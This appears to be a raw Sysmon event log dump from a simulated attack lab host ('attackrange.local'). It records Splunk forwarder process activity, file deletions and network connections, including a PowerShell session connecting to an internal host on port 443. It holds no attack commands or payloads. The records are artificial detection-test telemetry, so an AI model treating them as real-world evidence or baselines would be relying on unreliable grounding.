Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497044Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:24.877{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497043Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:24.877{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497042Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:24.877{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497041Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:24.877{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497040Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:24.877{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-A06C-6140-7156-04000000C801}6632C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036497039Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:24.877{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A06C-6140-7156-04000000C801}6632C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036497038Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:24.860{B81B27B7-A06C-6140-7156-04000000C801}6632C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036497037Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:24.460{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0621F95A5FF3D0AD0940EF07BD7C13AE,SHA256=CB7B55E0151D0FA07D364A40C1B254684FBA03C923EA13971F5672A196D4228E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036497036Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:24.193{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A06C-6140-7056-04000000C801}6808C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497035Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:24.193{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497034Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:24.193{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497033Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:24.193{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497032Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:24.193{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497031Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:24.193{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-A06C-6140-7056-04000000C801}6808C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036497030Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:24.193{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A06C-6140-7056-04000000C801}6808C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036497029Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:24.178{B81B27B7-A06C-6140-7056-04000000C801}6808C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036497028Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:24.159{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=6FB4DDA3670BBD427E9A26E01448735B,SHA256=377D9EADF219FEDBA067EA7B8AA0FFA3DA2A19B304C7A249C2A02E13CD7961B9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497051Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:25.492{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EC4A4499B7A398DA34CFD16902E4C8F5,SHA256=92618297855F0A5D192B3A76839C6E5AF07B4A7673F367F21BEC1698A571F65E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497050Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:25.224{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5D231E2BA00F5AF11C71DF19DA212340,SHA256=D387AC47FCC660B1BCF602443A5134F47543159A7378F0D4E296352B3700A5FC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497049Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:25.224{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=ECF008A786C0E164F6AA5160EA3BE716,SHA256=990D1DBC48F93AAE853129C21E7C50DBD033BE503C32C74062DE533AA6CFCC24,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036497048Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:25.057{B81B27B7-A06C-6140-7156-04000000C801}66327096C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000036497047Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:54.739{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50487-false10.0.1.12-8000- 354300x800000000000000036497046Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:54.608{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50486-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036497052Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:26.538{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E968B785FD56FA514A19D32130C33144,SHA256=84F2C2A64176016740653C0320F7D983CCFE576943F34787E6E7595FD6899DA3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497053Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:27.554{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E3D2094068D8C3FD43C86B25F779F475,SHA256=9FF4AD0D58D56DC5EDA58316C764958F0B9D32C085E953D677F73FCBC3E567B2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497055Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:28.954{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=74B4FD04E9D5B97340C96F87C49332E5,SHA256=3323859A076C2D95D66D5500389B0BB0B65ACB5AEC68F07B166A0B9640B86103,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497054Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:28.573{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7981CE78437E1D9E640549B8480B3C3A,SHA256=6EDE695F3708B6245F854D1DF5B36FEB08BB5A12249216CDF52918B8FF5BE3B5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497057Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:59.619{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50488-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036497056Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:29.638{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F572A33CF39B0E2936B7C4960393C892,SHA256=BBAA3C240D5FC8E33F511087D7AD0AF2CCB394AED560F2AE7668A3B3616A7B6A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497058Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:30.656{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1DE6D9D4651B0CA7848AB665D9CDEA77,SHA256=7D7C68FE97FAB5C19332AC55A3DF6855CB46241F8E072614D0FE2B31247F8A88,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497060Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:31.674{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5AF5CB95CFCEA628CBC147D11B29C80E,SHA256=F89CA74788BCF4E95CAE8AB30CFFFC3A6AEF5E4E38EF6EDB307B3CE008A5D4D6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497059Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:00.736{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50489-false10.0.1.12-8000- 23542300x800000000000000036497062Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:32.704{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F5272CB874A2A900F5528B85472791F2,SHA256=02E668B1D122CFE031C774665EB1BF1E976BD4A0B02D6BFFDF649BD9612A0DF3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497061Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:32.489{B81B27B7-4013-611D-2700-00000000C801}2076NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=9D45E1BDB6F237A6CF51FFC6A12E6130,SHA256=87EEE278CDF62B2B86AF9CB87BDB04BAFB10272CEA175D83979B0C43158C5AB9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497063Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:33.752{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=11007CDD9891B09A5F941DA52C3B652B,SHA256=3C354BC49BA84087E869E37FE79E1D5745A1542FCF08DADAD21642C1C096E8AB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497066Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:34.973{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=33A32C44E1E933877F29066E2DCBDB44,SHA256=9B96592850873B9A919A56F193C5EA14A4C01B2709965F4A95A10FDE1BCD871F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497065Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:34.755{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=22EA01976CE0798604716ADF9AF82492,SHA256=60EC1D160D5FB5871C2663DA439F1B4C042E49818049ABB6DE22C1C54F9D2A04,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497064Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:04.155{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50490-false10.0.1.12-8089- 23542300x800000000000000036497068Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:35.773{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 